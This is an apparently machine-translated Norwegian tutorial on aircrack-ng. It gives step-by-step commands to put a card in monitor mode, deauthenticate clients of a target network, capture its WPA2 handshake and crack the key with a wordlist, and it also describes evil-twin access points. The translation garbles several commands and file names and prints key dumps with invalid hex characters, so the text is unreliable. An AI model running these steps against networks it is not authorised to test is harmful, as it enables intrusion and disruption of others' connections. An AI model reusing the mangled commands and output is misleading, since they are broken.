Hvordan du bruker aircrack-ng

Hvordan du bruker aircrack-ng
Det meste av tiden tenker folk aldri på nettverket de er koblet til. De tenker aldri hvor sikkert det nettverket er og hvor mye de risikerer konfidensielle data på daglig basis. Du kan kjøre sårbarhetskontroller på WiFi -nettverkene dine ved å bruke et veldig kraftig verktøy som heter Aircrack-ng og Wireshark. Wireshark brukes til å overvåke nettverksaktivitet. Aircrack-ng er mer som et aggressivt verktøy som lar deg hacke og gi tilgang til trådløse tilkoblinger. Å tenke som en inntrenger har alltid vært den tryggeste måten å beskytte deg mot et hack. Du kan kanskje forstå de nøyaktige handlingene som en inntrenger vil ta for å få tilgang til systemet ditt ved å lære om Aircrack. Du kan deretter gjennomføre samsvarskontroller på ditt eget system for å sikre at det ikke er usikkert.

Aircrack-ng er et komplett sett med programvare designet for å teste WiFi -nettverkssikkerhet. Det er ikke bare et enkelt verktøy, men en samling verktøy, som hver utfører et bestemt formål. Ulike områder med WiFi -sikkerhet kan jobbes med, som å overvåke tilgangspunktet, testing, angripe nettverket, knekke WiFi -nettverket og teste det. Aircracks sentrale mål er å avskjære pakkene og dechiffrere hasjene for å bryte passordene. Den støtter nesten alle de nye trådløse grensesnittene. Aircrack-ng er en forbedret versjon av et utdatert verktøy Suite Aircrack, NG refererer til Ny generasjon. Noen av de fantastiske verktøyene som fungerer sammen for å ta ut en større oppgave.

Airmon-ng:

Airmon-Ng er inkludert i Aircrack-Ng-settet som plasserer nettverksgrensesnittkortet i skjermmodus. Nettverkskort vil vanligvis bare godta pakker som. Du skal kunne fange disse pakkene uten å koble eller autentisere med tilgangspunktet. Det brukes til å sjekke statusen til et tilgangspunkt ved å sette nettverksgrensesnittet i skjermmodus. For det første må man konfigurere de trådløse kortene for å slå på skjermmodus, og drepe deretter alle bakgrunnsprosessene hvis du tror at noen prosess forstyrrer den. Etter å ha avsluttet prosessene, kan skjermmodus aktiveres på det trådløse grensesnittet ved å kjøre kommandoen nedenfor:

ubuntu@ubuntu: ~ $ sudo airmon-ng start wlan0 #

Du kan også deaktivere skjermmodus ved å stoppe Airmon-ng når som helst ved å bruke kommandoen nedenfor:

ubuntu@ubuntu: ~ $ sudo airmon-ng stopp wlan0 #

AIRODUMP-NG:

AIRODUMP-NG brukes til å liste opp alle nettverkene som omgir oss og for å se verdifull informasjon om dem. Den grunnleggende funksjonaliteten til AiroDump-Ng er å snuse pakker, så den er i hovedsak programmert til å ta tak i alle pakkene rundt oss mens du blir satt i skjermmodus. Vi vil kjøre det mot alle tilkoblinger rundt oss og samle inn data som antall klienter som.

Ved å skrive Airrodump-ng-kommandoen og gi det nettverksgrensesnittnavnet som parameter, kan vi aktivere dette verktøyet. Den vil liste opp alle tilgangspunktene, mengden datapakker, kryptering og autentiseringsmetoder som brukes, og navnet på nettverket (essid). Fra et hacking synspunkt er MAC -adressene de viktigste feltene.

ubuntu@ubuntu: ~ $ sudo airoDump-ng wlx0mon

Aircrack-ng:

Aircrack brukes til å knekke passord. Etter å ha fanget alle pakkene med Airrodump, kan vi knekke nøkkelen med Aircrack. Det knekker disse nøklene ved å bruke to metoder PTW og FMS. PTW -tilnærming gjøres i to faser. Til å begynne med blir bare ARP -pakkene brukt, og først da, hvis nøkkelen ikke blir sprukket etter søket, bruker den alle de andre fangede pakkene. Et pluss poeng med PTW -tilnærmingen er at ikke alle pakkene brukes til sprekker. I den andre tilnærmingen, jeg.e., FMS, vi bruker både de statistiske modellene og Brute Force Algos for å knekke nøkkelen. En ordbokmetode kan også brukes.

Aireplay-ng:

AirPlay-NG introduserer pakker til et trådløst nettverk for å skape eller akselerere trafikken. Pakker fra to forskjellige kilder kan fanges opp av AirePlay-Ng. Den første er live -nettverket, og det andre er pakkene fra den allerede eksisterte PCAP -filen. AirPlay-Ng er nyttig under et deauthentication-angrep som er rettet mot et trådløst tilgangspunkt og en bruker. Dessuten kan du utføre noen angrep som Coffee Latte Attack med Airplay-NG, et verktøy som lar deg få en nøkkel fra klientens system. Du kan oppnå dette ved å fange en ARP -pakke og deretter manipulere den og sende den tilbake til systemet. Klienten vil deretter lage en pakke som kan fanges opp av AiroDump og Aircrack sprekker nøkkelen fra den modifiserte pakken. Noen andre angrepsalternativer for airplay-ng inkluderer chopchop, fragment arepreplay osv.

Airbase-ng:

Airbase-ng brukes til å transformere en inntrengerens datamaskin til et kompromittert tilkoblingspunkt for andre å koble til. Ved hjelp av Airbase-NG kan du hevde å være et lovlig tilgangspunkt og gjennomføre mann-i-midtangrep på datamaskiner som er knyttet til nettverket ditt. Denne typen angrep kalles onde tvillingangrep. Det er umulig for grunnleggende brukere å skille mellom et lovlig tilgangspunkt og et falskt tilgangspunkt. Så den onde tvillingtrusselen er blant de mest truende trådløse truslene vi står overfor i dag.

Airolib-ng:

Airolib fremskynder hackingprosessen ved å lagre og administrere passordlistene og tilgangspunktet. Databasestyringssystemet som brukes av dette programmet er SQLite3, som mest er tilgjengelig på alle plattformer. Passordsprekker inkluderer beregningen av den parvis masternøkkelen som den private forbigående nøkkelen (PTK) er trukket ut. Ved hjelp av PTK kan du bestemme rammemeldingsidentifikasjonskoden (MIC) for en gitt pakke og teoretisk finne at mikrofonen er lik pakken, så hvis PTK hadde rett, hadde PMK også riktig.

For å se passordlistene og tilgangsnettverkene som er lagret i databasen, skriver du inn følgende kommando:

ubuntu@ubuntu: ~ $ sudo airolib -ng testdatabase -stats

Her er testdatabase DB som du vil ha tilgang til eller opprette, og -stats er operasjonen du vil utføre på den. Du kan utføre flere operasjoner på databasefeltene, som å prioritere noen SSID eller noe. For å bruke Airolib-NG med Aircrack-Ng, skriv inn følgende kommando:

ubuntu@ubuntu: ~ $ sudo aircrack -ng -r testdatabase wpa2.Eapol.lokk

Her bruker vi den allerede beregnede PMK -er som er lagret i testdatabase For å få fart på passordets sprekkerprosess.

Sprekker WPA/WPA2 ved bruk av Aircrack-NG:

La oss se på et lite eksempel på hva Aircrack-ng kan gjøre med hjelp av noen av de fantastiske verktøyene. Vi vil knekke et WPA/WPA2-nettverks pre-delte nøkkel ved hjelp av en ordbokmetode.

Det første vi trenger å gjøre er å liste opp nettverksgrensesnitt som støtter skjermmodus. Dette kan gjøres ved hjelp av følgende kommando:

ubuntu@ubuntu: ~ $ sudo airmon-ng
Phy Interface Driver brikkesett
PHY0 WLX0 RTL8XXXU Realtek Semiconductor Corp.

Vi kan se et grensesnitt; Nå må vi legge nettverksgrensesnittet vi har funnet (WLX0) i skjermmodus ved å bruke følgende kommando:

ubuntu@ubuntu: ~ $ sudo airmon-ng start wlx0

Det har aktivert skjermmodus på grensesnittet som heter wlx0mon.

Nå bør vi begynne å lytte til sendinger av rutere i nærheten gjennom nettverksgrensesnittet vi har lagt i skjermmodus.

ubuntu@ubuntu: ~ $ sudo airoDump-ng wlx0mon
CH 5] [Forløpt: 30 s] [2020-12-02 00:17
BSSID PWR Beacons #Data, #/S CH MB Enc Cipher Auth Essid
E4: 6F: 13: 04: CE: 31 -45 62 27 0 1 54E WPA2 CCMP PSK Crackit
C4: E9: 84: 76: 10: BE -63 77 0 0 6 54E. WPA2 CCMP PSK HACKME
C8: 3A: 35: A0: 4E: 01 -63 84 0 0 8 54E WPA2 CCMP PSK NET07
74: DA: 88: FA: 38: 02 -68 28 2 0 11 54E WPA2 CCMP PSK TP -LINK_3802
BSSID Station PWR Rate Lost Frames Probe
E4: 6F: 13: 04: CE: 31 5C: 3A: 45: D7: EA: 8B -3 0 - 1E 8 5
E4: 6F: 13: 04: CE: 31 D4: 67: D3: C2: CD: D7 -33 1e- 6e 0 3
E4: 6F: 13: 04: CE: 31 5C: C3: 07: 56: 61: EF -35 0 - 1 0 6
E4: 6F: 13: 04: CE: 31 f.Kr

Målnettverket vårt er Crackit i dette tilfellet, som for tiden kjører på kanal 1.

Her for å knekke passordet til målnettverket, må vi fange et 4-veis håndtrykk, som skjer når en enhet prøver å koble til et nettverk. Vi kan fange det ved å bruke følgende kommando:

ubuntu@ubuntu: ~ $ sudo airoDump -ng -c 1 - -bssid e4: 6f: 13: 04: CE: 31 -w /Hjem WLX0

-c : Kanal

-Bssid: BSSID av målnettverket

-w : Navnet på katalogen der PCAP -filen blir plassert

Nå må vi vente på at en enhet skal koble seg til nettverket, men det er en bedre måte å fange et håndtrykk. Vi kan deauthentisere enhetene til AP ved å bruke et deauthentication -angrep ved hjelp av følgende kommando:

ubuntu@ubuntu: ~ $ sudo aireplay -ng -0 -a e4: 6f: 13: 04: CE: 31

en: BSSID av målnettverket

-0: Deauthentication Attack

Vi har koblet fra alle enhetene, og nå må vi vente på at en enhet skal koble seg til nettverket.

CH 1] [Forløpt: 30 s] [2020-12-02 00:02] [WPA-håndtrykk: E4: 6F: 13: 04: CE: 31
BSSID PWR RXQ Beacons #Data, #/S CH MB Enc Cipher Auth E
E4: 6F: 13: 04: CE: 31 -47 1 228 807 36 1 54E WPA2 CCMP PSK P
BSSID Station PWR Rate Lost Frames Probe
E4: 6F: 13: 04: CE: 31 f.Kr.: 91: B5: F8: 7E: D5 -35 0 - 1 0 1
E4: 6F: 13: 04: CE: 31 5C: 3A: 45: D7: EA: 8B -29 0E- 1E 0 22
E4: 6F: 13: 04: CE: 31 88: 28: B3: 30: 27: 7e -31 0e- 1 0 32
E4: 6F: 13: 04: CE: 31 D4: 67: D3: C2: CD: D7 -35 0e- 6e 263 708 Crackit
E4: 6F: 13: 04: CE: 31 D4: 6a: 6a: 99: Ed: E3 -35 0e- 0e 0 86
E4: 6F: 13: 04: CE: 31 5C: C3: 07: 56: 61: EF -37 0 - 1E 0 1

Vi fikk en hit, og ved å se på øverste høyre hjørne rett ved siden av, kan vi se at et håndtrykk er blitt tatt. Se nå i den spesifiserte mappen ( /hjem i vårt tilfelle) for en “.PCAP”Fil.

For å knekke WPA -tasten, kan vi bruke følgende kommando:

ubuntu@ubuntu: ~ $ sudo aircrack -ng -a2 -w rockyou.TXT -B E4: 6F: 13: 04: CE: 31 Håndtrykk.lokk
B: BSSID av målnettverket
-A2: WPA2 -modus
Rockyou.TXT: Ordbokfilen som brukes
Håndtrykk.CAP: Filen som inneholder fanget håndtrykk
Aircrack-ng 1.2 beta3
[00:01:49] 10566 tastene testet (1017.96 k/s)
Nøkkel funnet! [ du tok meg ]
Master Key: 8d EC 0C EA D2 BC 6B H7 J8 K1 A0 89 6B 7B 6D
0C 06 08 ED BC 6B H7 J8 K1 A0 89 6B 7B B F7 6F 50 C
Forbigående nøkkel: 4d C4 5R 6T 76 99 6G 7H 8D EC
H7 J8 K1 A0 89 6B 7B 6D AF 5B 8D 2D A0 89 6B
A5 BD K1 A0 89 6B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A0 89
8D EC 0C EA D2 BC 6B H7 J8 K1 A0 89 6B
Mac: CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71

Nøkkelen til målnettverket vårt har blitt sprukket vellykket.

Konklusjon:

Trådløse nettverk er overalt, brukt av hvert selskap, fra arbeidere som bruker smarttelefoner til industrielle kontrollenheter. I følge forskning vil nesten over 50 prosent av internetttrafikken være over wifi i 2021. Trådløse nettverk har mange fordeler, kommunikasjon utenfor dører, rask internettilgang på steder der det er nesten umulig å legge ledninger, kan utvide nettverket uten 't der.

Til tross for disse fordelene, er det et stort spørsmålstegn om ditt privatliv og sikkerhet. Som disse nettverkene; Innenfor overføringsområdet for rutere er åpne for alle, de kan lett bli angrepet, og dataene dine kan lett bli kompromittert. For eksempel, hvis du er koblet til noen offentlige wifi, kan alle som er koblet til det nettverket enkelt sjekke nettverkstrafikken din ved hjelp av litt intelligens og ved hjelp av fantastiske verktøy som er tilgjengelige og til og med dumpe det.